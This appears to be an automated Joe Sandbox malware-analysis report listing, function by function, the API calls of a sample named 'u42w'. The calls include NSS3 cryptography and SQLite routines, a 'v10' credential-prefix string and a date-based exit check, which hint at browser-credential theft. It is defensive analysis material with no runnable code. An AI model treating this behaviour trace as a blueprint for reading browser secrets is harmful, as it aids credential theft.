                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8DE53A
                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8DE5BC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                                                                              • Opcode ID: 49aee81b6a76ffc66541ec46daa5b52094d0173012f24a847d811d98540b7059
                                                                                                                                                                                                                              • Instruction ID: 99ffc0515068fce6f13b02d74c57769c9a338cbd59b41542473c6c02abbad3f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49aee81b6a76ffc66541ec46daa5b52094d0173012f24a847d811d98540b7059
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A3144306507249FC3218EADC88196AF3B0FB42664B550E7CE848A7B41F360F989C3E0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C940BDE), ref: 6C940DCB
                                                                                                                                                                                                                              • strrchr.VCRUNTIME140(00000000,0000005C,?,6C940BDE), ref: 6C940DEA
                                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C940BDE), ref: 6C940DFC
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C940BDE), ref: 6C940E32
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • %s incr => %d (find lib), xrefs: 6C940E2D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                              • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                              • API String ID: 97259331-2309350800
                                                                                                                                                                                                                              • Opcode ID: eb95efdc56d2ce7d1fb20cc972063ab130eca1ccf5a08fa3bb86ee10cb463f84
                                                                                                                                                                                                                              • Instruction ID: df70821911efb05cbeaacb90d7ae76f01609d80c01a2ae5167e7cc1e7ef8e8b8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb95efdc56d2ce7d1fb20cc972063ab130eca1ccf5a08fa3bb86ee10cb463f84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA0124727007209FE7208F259C45E2773FCDB45B09B05842DE909D7A41E762EC6987E1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C99C5C7
                                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C99C603
                                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C99C636
                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?), ref: 6C99C6D7
                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?), ref: 6C99C6E1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: K11_$DoesMechanism$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3860933388-0
                                                                                                                                                                                                                              • Opcode ID: 8c27436957fc5584d6415a95fb795c3acc998b1cb2d3afd86114d64b6a2d8efc
                                                                                                                                                                                                                              • Instruction ID: 68ed61f79a141fd3fbc83ddffc20544a1b571c63b56846002d7b20ea4871f106
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c27436957fc5584d6415a95fb795c3acc998b1cb2d3afd86114d64b6a2d8efc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C04163B560120AAFDB019F69DC81DAB77A9EF28248B584038FD09D7711E732D925CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F228
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F36D
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                              • Opcode ID: 5303e8b0a560fefca7da098d29ddf66122e76fee1affa40d45572e867032544e
                                                                                                                                                                                                                              • Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5303e8b0a560fefca7da098d29ddf66122e76fee1affa40d45572e867032544e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                              • String ID: @$v10
                                                                                                                                                                                                                              • API String ID: 1400469952-24753345
                                                                                                                                                                                                                              • Opcode ID: e18eec538fa561213ccf180fba20d045b7f3e1eebe33c1532388784ee480f8f5
                                                                                                                                                                                                                              • Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e18eec538fa561213ccf180fba20d045b7f3e1eebe33c1532388784ee480f8f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,6CA87379,00000002,?), ref: 6C9E2493
                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C9E24B4
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6CA87379,00000002,?), ref: 6C9E24EA
                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6CA87379,00000002,?), ref: 6C9E24F5
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6CA87379,00000002,?), ref: 6C9E24FE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Error$Alloc_FreeK11_Utilfree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2595244113-0
                                                                                                                                                                                                                              • Opcode ID: e55f5e22a919d8a33635baae8d234f1208e2f4825eeb9cf3dc1d676a35b0ea6e
                                                                                                                                                                                                                              • Instruction ID: 9860a47c3ba7c3903592d0689f3c565415ef2ed0813ba98633f99406c9cd2751
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e55f5e22a919d8a33635baae8d234f1208e2f4825eeb9cf3dc1d676a35b0ea6e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6831E1B1A00117AFEB058FA5DC45BBF77A8EF68308F108125FD1496A90F735D855C7A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3 ref: 6C9544FF
                                                                                                                                                                                                                                • Part of subcall function 6C9B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C958298,?,?,?,6C94FCE5,?), ref: 6C9B07BF
                                                                                                                                                                                                                                • Part of subcall function 6C9B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9B07E6
                                                                                                                                                                                                                                • Part of subcall function 6C9B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9B081B
                                                                                                                                                                                                                                • Part of subcall function 6C9B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9B0825
                                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C954524
                                                                                                                                                                                                                              • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C954537
                                                                                                                                                                                                                              • CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C954579
                                                                                                                                                                                                                                • Part of subcall function 6C9541B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C9541BE
                                                                                                                                                                                                                                • Part of subcall function 6C9541B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C9541E9
                                                                                                                                                                                                                                • Part of subcall function 6C9541B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C954227
                                                                                                                                                                                                                                • Part of subcall function 6C9541B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C95423D
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C95459C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3193526912-0
                                                                                                                                                                                                                              • Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
                                                                                                                                                                                                                              • Instruction ID: b26436077bf3c93370efcd25ebbbb36a8ed8cb1e7518eb2b785c24387149cc08
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC21F5717052009BEB90CE29AC84F6B37AC9F51658F940428FC15CFB49E721E936CFA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,6C953FFF,00000000,?,?,?,?,?,6C951A1C,00000000,00000000), ref: 6C95ADA7
                                                                                                                                                                                                                                • Part of subcall function 6C9B14C0: TlsGetValue.KERNEL32 ref: 6C9B14E0
                                                                                                                                                                                                                                • Part of subcall function 6C9B14C0: EnterCriticalSection.KERNEL32 ref: 6C9B14F5
                                                                                                                                                                                                                                • Part of subcall function 6C9B14C0: PR_Unlock.NSS3 ref: 6C9B150D
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C953FFF,00000000,?,?,?,?,?,6C951A1C,00000000,00000000), ref: 6C95ADB4
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C
                                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,?,6C953FFF,?,?,?,?,6C953FFF,00000000,?,?,?,?,?,6C951A1C,00000000), ref: 6C95ADD5
                                                                                                                                                                                                                                • Part of subcall function 6C9AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C9A8D2D,?,00000000,?), ref: 6C9AFB85
                                                                                                                                                                                                                                • Part of subcall function 6C9AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C9AFBB1
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CA794B0,?,?,?,?,?,?,?,?,6C953FFF,00000000,?), ref: 6C95ADEC
                                                                                                                                                                                                                                • Part of subcall function 6C9AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA818D0,?), ref: 6C9AB095
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C953FFF), ref: 6C95AE3C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2372449006-0
                                                                                                                                                                                                                              • Opcode ID: be955f46fb7b9f317205b084e57858631fe2874d95f66b42b9c62013c853d839
                                                                                                                                                                                                                              • Instruction ID: 7adb074bbda1c9005225496531a8f3e93bf402781317420bf93d49703414aaee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be955f46fb7b9f317205b084e57858631fe2874d95f66b42b9c62013c853d839
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C112671E002056BE710DB65AC40BBF77BCEFB524CF444229EC1996741FB20E96D82B6
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,02F60C98,?,0041D8AC,?,00000000,?), ref: 0041362C
                                                                                                                                                                                                                              • sscanf.NTDLL ref: 00413659
                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,02F60C98,?,0041D8AC), ref: 00413672
                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02F60C98,?,0041D8AC), ref: 00413680
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041369A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2533653975-0
                                                                                                                                                                                                                              • Opcode ID: 206953169676f68ef5873ac71a5c5530c3512e9c7508a8b221d3de6f3f6071f5
                                                                                                                                                                                                                              • Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 206953169676f68ef5873ac71a5c5530c3512e9c7508a8b221d3de6f3f6071f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C9E461B,-00000004), ref: 6C9E04DF
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,?,6C9E461B,-00000004), ref: 6C9E0510
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C9E0520
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C9E461B,-00000004), ref: 6C9E0534
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,6C9E461B,-00000004), ref: 6C9E0543
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3052423345-0
                                                                                                                                                                                                                              • Opcode ID: 5b5866bd736f4d3f91e58104454bc81af91e4161d705296523e2ca9d1f861b3e
                                                                                                                                                                                                                              • Instruction ID: ec8aeb7362afab76acc60cdc5bab5113b41d9e2939ac9cd48a96651114693a02
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b5866bd736f4d3f91e58104454bc81af91e4161d705296523e2ca9d1f861b3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E112771A042826BEB017E7A9C04B6936A8EF3A318F609624E429D3991EF32D145DB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6C991E10: TlsGetValue.KERNEL32 ref: 6C991E36
                                                                                                                                                                                                                                • Part of subcall function 6C991E10: EnterCriticalSection.KERNEL32(?,?,?,6C96B1EE,2404110F,?,?), ref: 6C991E4B
                                                                                                                                                                                                                                • Part of subcall function 6C991E10: PR_Unlock.NSS3 ref: 6C991E76
                                                                                                                                                                                                                              • free.MOZGLUE(?,6C97D079,00000000,00000001), ref: 6C97CDA5
